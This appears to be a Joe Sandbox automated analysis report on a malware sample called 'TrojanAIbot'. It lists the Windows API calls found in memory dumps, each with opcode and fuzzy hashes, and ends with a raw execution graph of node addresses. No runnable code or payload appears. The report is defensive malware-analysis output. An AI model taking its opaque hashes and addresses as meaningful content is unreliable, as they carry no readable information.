                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05B2F8C2,?,?,?,?,?), ref: 05B2F967
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: 0460dcaeb6b1ebfc54774e81eb54ad8d3dc44b272fa74ff2a8a0c4a2c707c283
                                                                                                                                • Instruction ID: 4f363889db6c39627a2984060df7bbdd7cfdffa89beadae86b2ae0b870425ed7
                                                                                                                                • Opcode Fuzzy Hash: 0460dcaeb6b1ebfc54774e81eb54ad8d3dc44b272fa74ff2a8a0c4a2c707c283
                                                                                                                                • Instruction Fuzzy Hash: 77218E76800359DFDB10CFAAC845AEEBFF8EF48310F14805AE555A7250C339A944CFA5
                                                                                                                                APIs
                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05B2F8C2,?,?,?,?,?), ref: 05B2F967
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: d314a9bd8cd6a2683b000782ff59c50a950e1740e59b371daf2bc863f4150215
                                                                                                                                • Instruction ID: 4a7b0773174350ee1e617986357955c8b23d6fe3898ad3e79f1197ed0d652e0c
                                                                                                                                • Opcode Fuzzy Hash: d314a9bd8cd6a2683b000782ff59c50a950e1740e59b371daf2bc863f4150215
                                                                                                                                • Instruction Fuzzy Hash: 541159B18003599FDB10CFAAC845AEEBFF8EF48310F14845AE919A7210C379A950CFA0
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 05B2D592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: 2ba0300a37a73ae3f72c70a11f143123d0ea45f3578c21fc83427fb5c318a665
                                                                                                                                • Instruction ID: 1cd7a751931c80c608539f72f17e743746a68fd2610315b94133f6af4983a4bd
                                                                                                                                • Opcode Fuzzy Hash: 2ba0300a37a73ae3f72c70a11f143123d0ea45f3578c21fc83427fb5c318a665
                                                                                                                                • Instruction Fuzzy Hash: 581112B68002598FDB10CF9AC444BEEFBF5EF88320F10846AD859A7240D378A545CFA1
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05B2FCCD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 5036dfdbbdbbd068e8c16d023d9df488ca9ca7e5da3e133eab41d2eb7e6cbdcc
                                                                                                                                • Instruction ID: 319a172646e0284845a1b29edaab55be49f6373a216abcc0b1dff658f652cd31
                                                                                                                                • Opcode Fuzzy Hash: 5036dfdbbdbbd068e8c16d023d9df488ca9ca7e5da3e133eab41d2eb7e6cbdcc
                                                                                                                                • Instruction Fuzzy Hash: 161133B58003098FCB10DF9AD48ABEEBFF8FB58310F10844AD918A7240C379A944CFA1
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 025BD55E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 446ae0ab3a8bdc290d0ba2e28a8bbcc595524027cc9815fbb625b01c0b9d47e1
                                                                                                                                • Instruction ID: 75325c888f2c76a5eb8ac99b2e3e33736eff1d40dcdf8fb9477e3b1798f58cea
                                                                                                                                • Opcode Fuzzy Hash: 446ae0ab3a8bdc290d0ba2e28a8bbcc595524027cc9815fbb625b01c0b9d47e1
                                                                                                                                • Instruction Fuzzy Hash: 261110B6C002498FCB10CF9AC444ADEFBF4FF88314F10846AD819A7240D379A945CFA5
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05B2FCCD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: aaf17cd31e6925ffc012d8098be9034e0fc58b56009743cf1cbe11b0ca79503a
                                                                                                                                • Instruction ID: 3c8ddf3910852da999c2a8c2f7e32dc6739099e7cac3e15831fa6c83446a3078
                                                                                                                                • Opcode Fuzzy Hash: aaf17cd31e6925ffc012d8098be9034e0fc58b56009743cf1cbe11b0ca79503a
                                                                                                                                • Instruction Fuzzy Hash: 6911F2B58003589FDB10DF9AD549BEEBFF8FB48320F10845AE919A7200C379A944CFA5
                                                                                                                                APIs
                                                                                                                                • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05B24115
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1378638983-0
                                                                                                                                • Opcode ID: d5467c87bbc4953c1fffabb2efd4db088f4ef11aba71753618c62f6d03b8c41d
                                                                                                                                • Instruction ID: 2b427a4c2c20e01fcb3e417a3dde4c07c0895658dcd40e27f9748aa5e5dd1012
                                                                                                                                • Opcode Fuzzy Hash: d5467c87bbc4953c1fffabb2efd4db088f4ef11aba71753618c62f6d03b8c41d
                                                                                                                                • Instruction Fuzzy Hash: 6D1125B58002189FDB10DF9AC485BEEBBF8EB58310F20845AD919A7700C378A944CFB5
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05B9319D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: e1b6ee34a19f10889748843be3dc08b0691499e9d0b30f56f06d1001b22e7835
                                                                                                                                • Instruction ID: 34a02c483d1b7f61829b2d4b6fb09e30718c129acba174d3f940ece2c499af8a
                                                                                                                                • Opcode Fuzzy Hash: e1b6ee34a19f10889748843be3dc08b0691499e9d0b30f56f06d1001b22e7835
                                                                                                                                • Instruction Fuzzy Hash: 961103B59006488FCB10DF9AD5497DEBFF4EF48310F24885AD519A7210C379A944CFA5
                                                                                                                                APIs
                                                                                                                                • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05B24115
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1378638983-0
                                                                                                                                • Opcode ID: 836ca3a8e659d1bc81ca71ea258a5cf577b8fd1954293b055ce66541e42741df
                                                                                                                                • Instruction ID: f19bf1b88cbff569447d1e26d91fb6141cc14f88b280addad933feaa37dbc96d
                                                                                                                                • Opcode Fuzzy Hash: 836ca3a8e659d1bc81ca71ea258a5cf577b8fd1954293b055ce66541e42741df
                                                                                                                                • Instruction Fuzzy Hash: 261103B58002589FDB10DF9AD585BDEBFF8EF58320F20845AD919A7700C379A944CFA1
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05B9319D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: 896ec7e179d7a6b9ffb469cf4094a4dc80f187758c119308c93f1b7af40a4f58
                                                                                                                                • Instruction ID: b7ef83d94ad1680cabf4df2cd7dbc16cffca9344f5727cc524c2d11341bafccb
                                                                                                                                • Opcode Fuzzy Hash: 896ec7e179d7a6b9ffb469cf4094a4dc80f187758c119308c93f1b7af40a4f58
                                                                                                                                • Instruction Fuzzy Hash: 7C1145B18003088FCB20DF9AD548B9EBFF4EB48310F20885AD519A7210C379A944CFA0
                                                                                                                                APIs
                                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05B93687), ref: 05B94125
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatchMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                • Opcode ID: 033b24af7e447e3f23b0c149a4f27481624c384dfc192c121504a9c049036ceb
                                                                                                                                • Instruction ID: fb1d390a615fade7cba6b959f26d2d631287a9c979b7dda5568768ab0943a548
                                                                                                                                • Opcode Fuzzy Hash: 033b24af7e447e3f23b0c149a4f27481624c384dfc192c121504a9c049036ceb
                                                                                                                                • Instruction Fuzzy Hash: EC11E0B5C046588FCB14DF9AD448A9EFBF4FB58314F10846AE519A7240D378A944CFA5
                                                                                                                                APIs
                                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05B93687), ref: 05B94125
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatchMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                • Opcode ID: eccd6ab838b27d6a1f1e6fe24e0e2fca01950bee4c0526d2fd992aeb9931dba3
                                                                                                                                • Instruction ID: 09d41963acb208959ced37224605aa1c79e1ee4699633da4fc36b98d26710b46
                                                                                                                                • Opcode Fuzzy Hash: eccd6ab838b27d6a1f1e6fe24e0e2fca01950bee4c0526d2fd992aeb9931dba3
                                                                                                                                • Instruction Fuzzy Hash: AE11FEB5C042588FCB10DF9AE545ADEFFF4FB48310F10856AE429A7200D378A545CFA5
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 05B2D592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: 8f5da039ac3d795637278d1d909a7a2ffedf4bdd2db1f808d3b842af52bf6660
                                                                                                                                • Instruction ID: 65da823254b6fe9c8f387d5eea1d355d21c9b44f1b5edc739c62a128e44062cd
                                                                                                                                • Opcode Fuzzy Hash: 8f5da039ac3d795637278d1d909a7a2ffedf4bdd2db1f808d3b842af52bf6660
                                                                                                                                • Instruction Fuzzy Hash: A9F0EC338083508FD3109B65C4083EEBBE0EB22329F19809AD088C2092C37C928ADB21
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 96c8d3b12670599ba0d835d33fba8ee08f6df85cc3c144e0a4f04f6bcd94d145
                                                                                                                                • Instruction ID: 180655eddecca3860f25fea7d5ea314a5e308051195a784f679f91b9ab910a79
                                                                                                                                • Opcode Fuzzy Hash: 96c8d3b12670599ba0d835d33fba8ee08f6df85cc3c144e0a4f04f6bcd94d145
                                                                                                                                • Instruction Fuzzy Hash: C7216A71508200DFDB09DF14C9C0F26BFA5FB94314F20C1A9E90A0B656C336DC06C7A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4518550786.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_bbd000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e2c09a123901f2bbd4f96cd1f60be731d3b21d60121161dd43bec20e9e878172
                                                                                                                                • Instruction ID: 7463a929b9511875b91b5a8a1f9407b8538a78e9f34ea3916c2d4dac4452f580
                                                                                                                                • Opcode Fuzzy Hash: e2c09a123901f2bbd4f96cd1f60be731d3b21d60121161dd43bec20e9e878172
                                                                                                                                • Instruction Fuzzy Hash: 3F212271604200DFCB14EF24D9D0B26BFA5FB88314F60C5ADD80A4B296D3BED807CA61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4518550786.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_bbd000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 02bf752d257f8210cf4c16efa07038f96dd903d3b15838dd87bd2398cea4ab88
                                                                                                                                • Instruction ID: d7a08d536ca30fc5e40255f1fc75be9b6f96c77f6981e747863266141e9e3700
                                                                                                                                • Opcode Fuzzy Hash: 02bf752d257f8210cf4c16efa07038f96dd903d3b15838dd87bd2398cea4ab88
                                                                                                                                • Instruction Fuzzy Hash: 8721A4755093808FCB02DF20D594715BFB1EB45314F28C5DAD8498B297C37A980ACB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                • Instruction ID: f7a9a99900d964f0b520cc0f2395cf28f1834550e9540c40ec38d5f20e435777
                                                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                • Instruction Fuzzy Hash: EE110376404280CFCB06CF10D9C4B16BFB1FB94314F24C6E9D94A0B656C336D85ACBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 92f9be23a6762f0723f7feb4a4b910637264c2c95b8cc884ec4d4d2369c850bf
                                                                                                                                • Instruction ID: a8dec785c8fde3419e5aebf017b307fedddfd01a73a91b7a389abcdbcdb92535
                                                                                                                                • Opcode Fuzzy Hash: 92f9be23a6762f0723f7feb4a4b910637264c2c95b8cc884ec4d4d2369c850bf
                                                                                                                                • Instruction Fuzzy Hash: CE01F7310083009AE7309B25CC94B67BFD8EF57720F28C4AAED4A0A686C2799801CA71
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d1255cec0b2d2762e3a8a8a4470ca99ab9ff1ccc288b3af5eb1bac67c5b98b2a
                                                                                                                                • Instruction ID: e1cf7614e3338632efa8212121de9f7c3a511bcf3416f273d63539824d233fc1
                                                                                                                                • Opcode Fuzzy Hash: d1255cec0b2d2762e3a8a8a4470ca99ab9ff1ccc288b3af5eb1bac67c5b98b2a
                                                                                                                                • Instruction Fuzzy Hash: DBF0F6710083449EE7208A16CC84B63FFE8FF52734F18C45AED494F286C2799C40CA70
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1541b9163fb5b9b1d37c19ba9f607c6d5a86564c090d8f2b1849bc871b5047f4
                                                                                                                                • Instruction ID: df6668e8e5f8f076e287f37128f771fac1bc53c5fec4b5ba094b24279a2f7f34
                                                                                                                                • Opcode Fuzzy Hash: 1541b9163fb5b9b1d37c19ba9f607c6d5a86564c090d8f2b1849bc871b5047f4
                                                                                                                                • Instruction Fuzzy Hash: 5762DF70A02219CFCB65DF64D898B9DBBB2FF48700F1081A9D40AA7769DB359E85CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a95cfe32821314b47773bfd276882df80f66ef459787bae92e8498e5f97c2c77
                                                                                                                                • Instruction ID: 6a3ba84cea0f6d5a472223c625c48028c933dbd6dad67057ade9c63e476997a4
                                                                                                                                • Opcode Fuzzy Hash: a95cfe32821314b47773bfd276882df80f66ef459787bae92e8498e5f97c2c77
                                                                                                                                • Instruction Fuzzy Hash: 9A62DF70A02219CFCB65DF64D898B9DBBB2FF48700F1081A9D40AA7769DB359E85CF41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0ebc91e3f814e0d2baf3665d693844c52550a74c86227fb320449d3980f4b19a
                                                                                                                                • Instruction ID: 17a18c1238d87bb909cc0bf2674cc5afe6c3ed32d2fbeee5e8a4037b2b2f1672
                                                                                                                                • Opcode Fuzzy Hash: 0ebc91e3f814e0d2baf3665d693844c52550a74c86227fb320449d3980f4b19a
                                                                                                                                • Instruction Fuzzy Hash: 97118E70C45309DFDB14AFB4D4583AEBFB0EB06305F1088A9C455E3591D7780A88CF52
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e3aabaa97ed75debbde369b02c72c041b0038dd6f2757b4a7ecff159de32baf3
                                                                                                                                • Instruction ID: 8dc6fc8a3394de427858a13d340106923ef84c98f3f82efce970f4a851c57308
                                                                                                                                • Opcode Fuzzy Hash: e3aabaa97ed75debbde369b02c72c041b0038dd6f2757b4a7ecff159de32baf3
                                                                                                                                • Instruction Fuzzy Hash: 2E012C70C4121ADFDB14EFB8D55C7AEBFB0EB05305F1098A9D416A3294DB794688CF91

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:8.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:1312
                                                                                                                                Total number of Limit Nodes:13
                                                                                                                                execution_graph 27911 2b7c350 27914 2b6f7c8 27911->27914 27913 2b7c358 27915 2b6f7d0 27914->27915 27915->27915 29006 2b688b8 27915->29006 27917 2b6f7f1 27918 2b6f7f6 27917->27918 27919 2b6f850 27918->27919 27920 2b6f87b 27919->27920 29012 2b689d0 27920->29012 27922 2b6f88e 27923 2b6f8b4 27922->27923 27924 2b6f8df 27923->27924 27925 2b689d0 4 API calls 27924->27925 27926 2b6f8f2 27925->27926 27927 2b6f918 27926->27927 27928 2b6f922 27927->27928 27929 2b689d0 4 API calls 27928->27929 27930 2b6f956 27929->27930 27931 2b6f986 27930->27931 27932 2b689d0 4 API calls 27931->27932 27933 2b6f9ba 27932->27933 27934 2b6f9ea 27933->27934 27935 2b689d0 4 API calls 27934->27935 27936 2b6fa1e 27935->27936 27937 2b6fa3c 27936->27937 27938 2b6fa4e 27937->27938 27939 2b689d0 4 API calls 27938->27939 27940 2b6fa82 27939->27940 27941 2b6faa0 27940->27941 27942 2b6fad3 27941->27942 27943 2b689d0 4 API calls 27942->27943 27944 2b6fae6 27943->27944 27945 2b6faf3 27944->27945 27946 2b7b2f8 27944->27946 29022 2b6f744 27945->29022 27948 2b6faf8 27948->27946 27949 2b6fb1e 27948->27949 27950 2b689d0 4 API calls 27949->27950 27951 2b6fb27 27950->27951 27952 2b689d0 4 API calls 27951->27952 27953 2b6fb4e 27952->27953 27954 2b689d0 4 API calls 27953->27954 27955 2b6fb81 27954->27955 27956 2b6fbd9 27955->27956 27957 2b6fbf1 27956->27957 27958 2b689d0 4 API calls 27957->27958 27959 2b6fbfd 27958->27959 27960 2b689d0 4 API calls 27959->27960 27961 2b6fc30 27960->27961 27962 2b6fc40 27961->27962 27963 2b689d0 4 API calls 27962->27963 27964 2b6fc63 27963->27964 27965 2b689d0 4 API calls 27964->27965 27966 2b6fc96 27965->27966 27967 2b6fcf9 27966->27967 27968 2b6fd06 27967->27968 27969 2b689d0 4 API calls 27968->27969 27970 2b6fd12 27969->27970 27971 2b6fd75 27970->27971 27972 2b689d0 4 API calls 27971->27972 27973 2b6fd8e 27972->27973 27974 2b689d0 4 API calls 27973->27974 27975 2b6fdc1 27974->27975 27976 2b689d0 4 API calls 27975->27976 27977 2b6fdf4 27976->27977 27978 2b689d0 4 API calls 27977->27978 27979 2b6fe27 27978->27979 27980 2b6fe48 27979->27980 27981 2b6fe7f 27980->27981 27982 2b689d0 4 API calls 27981->27982 27983 2b6fea3 27982->27983 27984 2b6feb3 27983->27984 27985 2b689d0 4 API calls 27984->27985 27986 2b6fed6 27985->27986 27987 2b689d0 4 API calls 27986->27987 27988 2b6ff09 27987->27988 27989 2b6ff30 27988->27989 27990 2b689d0 4 API calls 27989->27990 27991 2b6ff3c 27990->27991 27992 2b6ff94 27991->27992 27993 2b689d0 4 API calls 27992->27993 27994 2b6ffb8 27993->27994 27995 2b6ffe4 27994->27995 27996 2b689d0 4 API calls 27995->27996 27997 2b70034 27996->27997 27998 2b7005b 27997->27998 27999 2b689d0 4 API calls 27998->27999 28000 2b70067 27999->28000 28001 2b689d0 4 API calls 28000->28001 28002 2b7009a 28001->28002 28003 2b689d0 4 API calls 28002->28003 28004 2b700cd 28003->28004 28005 2b689d0 4 API calls 28004->28005 28006 2b70149 28005->28006 28007 2b689d0 4 API calls 28006->28007 28008 2b701c5 28007->28008 28009 2b689d0 4 API calls 28008->28009 28010 2b70241 28009->28010 28011 2b689d0 4 API calls 28010->28011 28012 2b702bd 28011->28012 28013 2b702cc 28012->28013 28014 2b70327 28013->28014 28015 2b7033f 28014->28015 28016 2b689d0 4 API calls 28015->28016 28017 2b70382 28016->28017 28018 2b703a3 28017->28018 28019 2b703bb 28018->28019 28020 2b689d0 4 API calls 28019->28020 28021 2b703fe 28020->28021 28022 2b70414 28021->28022 28023 2b70427 28022->28023 28024 2b70534 28022->28024 28025 2b70448 28023->28025 28026 2b70555 28024->28026 28028 2b689d0 4 API calls 28025->28028 28027 2b689d0 4 API calls 28026->28027 28029 2b705b0 28027->28029 28030 2b704a3 28028->28030 28032 2b705d1 28029->28032 28031 2b704c4 28030->28031 28034 2b689d0 4 API calls 28031->28034 28033 2b689d0 4 API calls 28032->28033 28035 2b7051f 28033->28035 28034->28035 28036 2b7052f 28035->28036 28037 2b7066d 28036->28037 28038 2b689d0 4 API calls 28037->28038 28039 2b706c8 28038->28039 28040 2b706e9 28039->28040 28041 2b689d0 4 API calls 28040->28041 28042 2b70744 28041->28042 28043 2b70751 28042->28043 28044 2b70794 28043->28044 28045 2b707ec 28044->28045 28046 2b70804 28045->28046 28047 2b689d0 4 API calls 28046->28047 28048 2b70810 28047->28048 28049 2b70880 28048->28049 28050 2b689d0 4 API calls 28049->28050 28051 2b7088c 28050->28051 28052 2b708fc 28051->28052 28053 2b689d0 4 API calls 28052->28053 28054 2b70908 28053->28054 28055 2b70978 28054->28055 28056 2b689d0 4 API calls 28055->28056 28057 2b70984 28056->28057 28058 2b709c5 28057->28058 28059 2b709fc 28058->28059 28060 2b70a07 28059->28060 28061 2b689d0 4 API calls 28060->28061 28062 2b70a20 28061->28062 28063 2b70a41 28062->28063 28064 2b70a4c 28063->28064 28065 2b70a78 28064->28065 28066 2b70a83 28065->28066 28067 2b689d0 4 API calls 28066->28067 28068 2b70a9c 28067->28068 28069 2b70abd 28068->28069 28070 2b70ac8 28069->28070 28071 2b70aff 28070->28071 28072 2b689d0 4 API calls 28071->28072 28073 2b70b18 28072->28073 28074 2b70b22 28073->28074 28075 2b70b2f 28074->28075 28076 2b70b42 28075->28076 28077 2b712fe 28075->28077 28079 2b70b63 28076->28079 28078 2b7132a 28077->28078 28080 2b71337 28078->28080 28082 2b70b9a 28079->28082 28081 2b71356 28080->28081 28083 2b7136e 28081->28083 28084 2b70bb2 28082->28084 28085 2b689d0 4 API calls 28083->28085 28086 2b689d0 4 API calls 28084->28086 28087 2b7137a 28085->28087 28088 2b70bbe 28086->28088 28089 2b713a6 28087->28089 